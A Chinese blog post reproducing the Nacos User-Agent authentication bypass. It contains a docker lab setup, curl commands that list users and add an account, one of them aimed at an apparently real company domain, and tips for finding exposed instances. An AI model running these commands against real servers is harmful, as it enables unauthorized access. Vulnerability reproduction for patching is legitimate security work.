NACOS身份认证绕过漏洞

最新推荐文章于 2024-08-26 15:13:27 发布
最新推荐文章于 2024-08-26 15:13:27 发布
阅读量1.1w 收藏 15
点赞数 3
分类专栏: 漏洞复现 文章标签: nacos漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/114022477
版权
本文详细介绍了Nacos存在的一个身份认证绕过漏洞,该漏洞允许攻击者未经授权访问和操作。受影响的版本包括<=Nacos2.0.0-ALPHA.1和<Nacos1.4.1。通过篡改User-Agent字段,攻击者可以创建新用户并进行登录操作。修复建议是升级到最新版本。此外,提供了漏洞复现步骤和批量检测POC,以及在渗透测试中发现此漏洞的方法。
摘要由CSDN通过智能技术生成

目录

漏洞描述

影响版本

docker-compose文件一键搭建漏洞环境

漏洞复现

修复建议

漏洞挖掘

NACOS身份认证绕过漏洞批量检测POC

nacos:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

漏洞描述

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本

  • <= Nacos 2.0.0-ALPHA.1
  • < Nacos 1.4.1

docker-compose文件一键搭建漏洞环境

使用nacos1.4.0版本(1.4.1不存在漏洞)的环境

下载并安装docker

docker-compose.yml文件内容如下

version: '3'
services:
  nacos:
    restart: always
    image: nacos/nacos-server:1.4.0
    container_name: nacos
    ports:
      - 8848:8848
    environment:
      MODE: standalone

执行docker-compose up -d启动漏洞环境

访问 http://192.168.xx.xx:8848/nacos/#/login

默认用户名密码 nacos,nacos

漏洞复现

1. 访问用户列表接口

http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

或者使用curl工具

curl -XGET 'http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞

2. 向服务器添加一个新的账号和密码

访问nacos/v1,截取请求包,将GET请求换为POST,User-Agent值修改为:Nacos-Server

服务器返回创建用户成功

或者使用curl工具

curl -XPOST 'https://lingting.mininglamp.com/nacos/v1/auth/users?username=test&password=test'

3. 再次查看用户列表,发现多了一个我们添加的账户

4. 用创建的账号进行登录

修复建议

升级至最新版

漏洞挖掘

在最近的一次真实的渗透测试中发现了这个漏洞,其部署在阿里云系统上,那如何来发现这个漏洞了

1. 可以在网站域名如.com后面拼接nacos,查看有没有nacos这个服务

2. 再访问用户接口列表查看,若没有漏洞则为这样,状态码为401

NACOS身份认证绕过漏洞批量检测POC

NACOS身份认证绕过漏洞批量检测poc.7z_nacos漏洞-网络安全文档类资源-CSDN下载

Ly4j
关注
专栏目录
poc整合】Nacos漏洞整理(上)——弱口令、未授权访问、JWT利用、未授权添加用户、身份验证绕过、derby SQL注入(漏洞更新截止2024.9.12)
m0_62783065的博客
09-13 341
poc整合】Nacos漏洞整理(上)——弱口令、未授权访问、JWT利用、未授权添加用户、身份验证绕过、derby SQL注入(漏洞更新截止2024.9.12)
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5664
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
Nacos漏洞总结复现
最新发布
2401_84578953的博客
08-26 1504
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos身份认证绕过漏洞(QVD-2023-6271)
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
Nacos 身份认证绕过漏洞(已修复)
weixin_58642210的博客
11-14 1347
Nacos 身份认证绕过漏洞
【备忘录】修复docker环境下的nacos安全漏洞身份认证绕过漏洞
Xcong_Zhu的博客
10-23 2449
nacos2.2.0.1和1.4.5版本之前的版本中,可能是为了便于开发环境使用,默认开启了一个自带的token默认值,导致上述报告中,可以利用默认的访问秘钥跳过认证,直接登陆。1、检查application.properties文件中token.secret.key属性,若为默认值,可参考:https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64加密。
【认证绕过NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6749
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该“NACOS身份认证绕过漏洞批量检测poc”是一个Proof of Concept(概念验证)文件,用于验证这个安全漏洞是否存在。POC文件通常包含一段代码或者脚本,开发者或安全研究人员可以使用这些代码来测试特定系统是否易受...
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
Nacos身份认证权限绕过+漏洞利用工具分享
hackzkaq的博客
12-27 2893
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 在线解密查看内容:
nacos权限绕过漏洞(nacos认证绕过安全漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 3452
可以看出在 1.2~1.4.0 的版本期间是存在认证绕过安全漏洞的,是因为 User-Agent 中包含了 Nacos-Server 使得认定请求来自于其他服务端,从而绕过了认证。nacos权限绕过漏洞环境搭建 我们选择版本nacos 1.4.0来对漏洞进行复现 下载安装包后 运行startup.cmd -m standalone 需要在环境变量中设置 JAVA_HOME ,设置完环境变量后重新打开一个命令行 否则并不生效 ,启动的时候最好用管理员权限启动,否则会出现启动不成功的问题
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
dzqxwzoe的博客
03-01 1011
本文仅做复现,不做分析!其实就是默认keyshiro550exchange的jwt伪造等,都是类似的问题。Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞(),开源服务管理平台Nacos默认配置下未对进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。基本上都受到了影响,最新的版本已修复漏洞
(附nuclei yaml文件)Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现
nglj9527的博客
05-20 953
Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中,当配置为使用身份验证(-Dnасоѕ.соrе.аuth.еnаblеd=truе)时,Nасоѕ 使用 AuthFiltеr ѕеrvlеt 过滤器强制执行身份验证。该过滤器有一个后门,使 Nасоѕ 服务器能够绕过该过滤器,从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头,因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。。
Nacos惊现安全漏洞修复后问题仍旧存在
热门推荐
一个天秤座的架构师
01-18 2万+
你好,我是threedr3am,我发现nacos最新版本1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制,依然存在绕过问题,在nacos开启了serverIdentity的自定义key-value鉴权后,通过特殊的url构造,依然能绕过限制访问任何http接口。 通过查看该功能,需要在application.properties添加配置nacos.core.auth.enable.userAgentAuthWhite:false,才能避免User-A
Nacos权限绕过漏洞
wybsw520的专栏
10-30 728
目前nacos越来越广泛,大多数的企业在使用微服务架构的时候,基本上都会选择nacos作为注册中心和配置中心。那nacos其实也是阿里开源的一个项目,存在漏洞,至少难免的。那我们今天就来分享一下nacos存在的漏洞问题,主要是一些安全漏洞的问题。毕竟现在很多政务的项目,都会做等保测试这块。等保做得多了,漏洞也就多了。这不,今天就又有一个漏洞了。那就开始修复喽!!!
漏洞复现 - - - Alibaba Nacos权限认证绕过
weixin_67503304的博客
08-03 5066
Alibaba Nacos权限认证绕过Max HackBar方式进行POST传参,简单易懂,操作方便。
nacos身份认证绕过漏洞
u013008898的博客
07-03 224
nacos身份认证绕过漏洞
nacos身份认证绕过漏洞批量检测poc
06-23
攻击者可以利用该漏洞绕过Nacos的身份验证,实现未经授权访问敏感信息或执行恶意操作。为了增强安全性,开发人员需要尽快修补漏洞。 为方便安全研究人员和开发人员识别漏洞,可以使用批量检测pocpoc是Proof of ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值